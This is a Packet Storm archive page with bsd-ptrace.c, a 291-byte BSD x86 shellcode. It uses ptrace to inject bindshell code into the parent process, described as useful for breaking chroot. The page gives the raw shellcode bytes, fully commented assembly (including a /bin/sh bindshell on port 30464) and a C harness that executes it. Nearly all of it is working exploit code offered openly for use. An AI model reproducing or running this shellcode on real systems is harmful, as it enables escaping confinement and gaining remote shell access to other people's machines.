exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

bsd-ptrace.c

bsd-ptrace.c
Posted Oct 21, 2002
Authored by eSDee | Site netric.org

291 byte BSD ptrace shellcode which injects a bindcode into the ppid, useful for breaking chroot.

tags | shellcode
systems | bsd
SHA-256 | 6550b1322a482de0869c99df39964fef13a59b4b140fc85adee39bda14d4dcaf

bsd-ptrace.c

Change Mirror Download
/* BSD-x86 291 byte ptrace shellcode by eSDee of Netric (www.netric.org) */

char
shellcode[]=
"\x31\xc0\xb0\x27\xcd\x80\x89\x45"
"\x04\x31\xc0\x31\xd2\x31\xc9\x50"
"\x50\xff\x75\x04\xb1\x09\x51\x50"
"\xb0\x1a\xcd\x80\x39\xc2\x74\x02"
"\xeb\x5f\x31\xc0\x50\x50\x50\xff"
"\x75\x04\x50\xb0\x07\xcd\x80\x31"
"\xc0\x50\x89\xea\x83\xc2\x08\x89"
"\x55\xfc\x52\xff\x75\x04\xb1\x21"
"\x51\x50\xb0\x1a\xcd\x80\x8b\x55"
"\x28\x89\x55\xf8\x31\xf6\xeb\x37"
"\x5e\x31\xc9\x31\xc0\x31\xdb\x8a"
"\x1e\x53\x46\xb0\x90\x38\xd8\x74"
"\x11\x52\xff\x75\x04\xb1\x04\x51"
"\x50\xb0\x1a\xcd\x80\x31\xc0\x42"
"\xeb\xdf\x31\xc0\x50\x50\xff\x75"
"\x04\xb1\x0a\x51\x50\xb0\x1a\xcd"
"\x80\x31\xc0\xb0\x01\xcd\x80\xe8"
"\xc4\xff\xff\xff"

/* bindcode starts here */
"\x31\xc0\x31\xdb"
"\x31\xc9\x31\xd2\xb0\x61\x51\xb1"
"\x06\x51\xb1\x01\x51\xb1\x02\x51"
"\x8d\x0c\x24\x51\xcd\x80\xb1\x02"
"\x31\xc9\x51\x51\x51\x80\xc1\x77"
"\x66\x51\xb5\x02\x66\x51\x8d\x0c"
"\x24\xb2\x10\x52\x51\x50\x8d\x0c"
"\x24\x51\x89\xc2\x31\xc0\xb0\x68"
"\xcd\x80\xb3\x01\x53\x52\x8d\x0c"
"\x24\x51\x31\xc0\xb0\x6a\xcd\x80"
"\x31\xc0\x50\x50\x52\x8d\x0c\x24"
"\x51\x31\xc9\xb0\x1e\xcd\x80\x89"
"\xc3\x53\x51\x31\xc0\xb0\x5a\xcd"
"\x80\x41\x53\x51\x31\xc0\xb0\x5a"
"\xcd\x80\x41\x53\x51\x31\xc0\xb0"
"\x5a\xcd\x80\x31\xdb\x53\x68\x6e"
"\x2f\x73\x68\x68\x2f\x2f\x62\x69"
"\x89\xe3\x31\xc0\x50\x54\x53\x50"
"\xb0\x3b\xcd\x80\x31\xc0\xb0\x01"
"\xcd\x80"
"\x90"; /* and a NOP to end */

int
main()
{
/* __asm( "xorl %eax,%eax
movb $0x27,%al # SYS_getppid
int $0x80
movl %eax,4(%ebp)

xorl %eax,%eax
xorl %edx,%edx
xorl %ecx,%ecx
pushl %eax
pushl %eax
pushl 4(%ebp) # getppid
movb $0x9, %cl # PT_ATTACH
pushl %ecx
pushl %eax
movb $0x1A,%al # SYS_ptrace
int $0x80 # ptrace(PT_ATTACH,getppid(),NULL,NULL);
cmp %eax,%edx
je PTRACE_WAIT
jmp EXIT # failed

PTRACE_WAIT:
xorl %eax,%eax
pushl %eax
pushl %eax
pushl %eax
pushl 4(%ebp) # getppid
pushl %eax
movb $0x07,%al # SYS_wait4
int $0x80
xorl %eax,%eax
pushl %eax
movl %ebp,%edx
addb $8, %edx
movl %edx, -4(%ebp)
pushl %edx
pushl 4(%ebp) # getppid
movb $0x21,%cl # PT_GETREGS
pushl %ecx
pushl %eax
movb $0x1A,%al # SYS_ptrace
int $0x80 # ptrace(PT_GETREGS,getppid(),&regs,NULL);
movl 40(%ebp), %edx
movl %edx, -8(%ebp)
xorl %esi,%esi
jmp GETEIP
BACK:
popl %esi

PTRACE_WRITE:
xorl %ecx,%ecx
xorl %eax,%eax
xorl %ebx,%ebx
movb (%esi), %ebx
pushl %ebx
inc %esi
movb $0x90, %al
cmpb %bl, %al # end of the shellcode
je PTRACE_DETACH
pushl %edx
pushl 4(%ebp) # getppid
movb $0x4,%cl
pushl %ecx
pushl %eax
movb $0x1A,%al # SYS_ptrace
int $0x80 # ptrace(PT_WRITE_I,getppid(),eip++,getchar);
xorl %eax,%eax
inc %edx
jmp PTRACE_WRITE

PTRACE_DETACH:
xorl %eax,%eax
pushl %eax
pushl %eax
pushl 4(%ebp) # getppid
movb $0xA, %cl
pushl %ecx # PT_DETACH
pushl %eax
movb $0x1A,%al # SYS_ptrace
int $0x80 # ptrace(PT_DETACH,getppid(),NULL,NULL);
EXIT:
xorl %eax,%eax
movb $0x01, %al # SYS_exit
int $0x80

GETEIP:
call BACK

SHELLCODE: # shellcode by r00tdude (ilja@netric.org)
xorl %eax,%eax # binds /bin/sh on port 30464
xorl %ebx,%ebx
xorl %ecx,%ecx
xorl %edx,%edx
movb $0x61,%al
pushl %ecx
movb $0x6,%cl
pushl %ecx
movb $0x1,%cl
pushl %ecx
movb $0x2,%cl
pushl %ecx
leal (%esp),%ecx
pushl %ecx
int $0x80
movb $0x2,%cl
xorl %ecx,%ecx
pushl %ecx
pushl %ecx
pushl %ecx
addb $0x77,%cl
pushw %cx
movb $0x2,%ch
pushw %cx
leal (%esp),%ecx
movb $0x10,%dl
pushl %edx
pushl %ecx
pushl %eax
leal (%esp),%ecx
pushl %ecx
movl %eax,%edx
xorl %eax,%eax
movb $0x68,%al
int $0x80
movb $0x1,%bl
pushl %ebx
pushl %edx
leal (%esp),%ecx
pushl %ecx
xorl %eax,%eax
movb $0x6a,%al
int $0x80
xorl %eax,%eax
pushl %eax
pushl %eax
pushl %edx
leal (%esp),%ecx
pushl %ecx
xorl %ecx,%ecx
movb $0x1e,%al
int $0x80
movl %eax,%ebx
pushl %ebx
pushl %ecx
xorl %eax,%eax
movb $0x5a,%al
int $0x80
inc %ecx
pushl %ebx
pushl %ecx
xorl %eax,%eax
movb $0x5a,%al
int $0x80
inc %ecx
pushl %ebx
pushl %ecx
xorl %eax,%eax
movb $0x5a,%al
int $0x80
xorl %ebx,%ebx
pushl %ebx
pushl $0x68732f6e
pushl $0x69622f2f
movl %esp,%ebx
xorl %eax,%eax
pushl %eax
pushl %esp
pushl %ebx
pushl %eax
movb $0x3b,%al
int $0x80
xorl %eax,%eax
movb $0x1,%al
int $0x80
nop");
*/

void (*funct)();
(long) funct = &shellcode;
printf("Length: %d\n", strlen(shellcode));
funct();
}
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close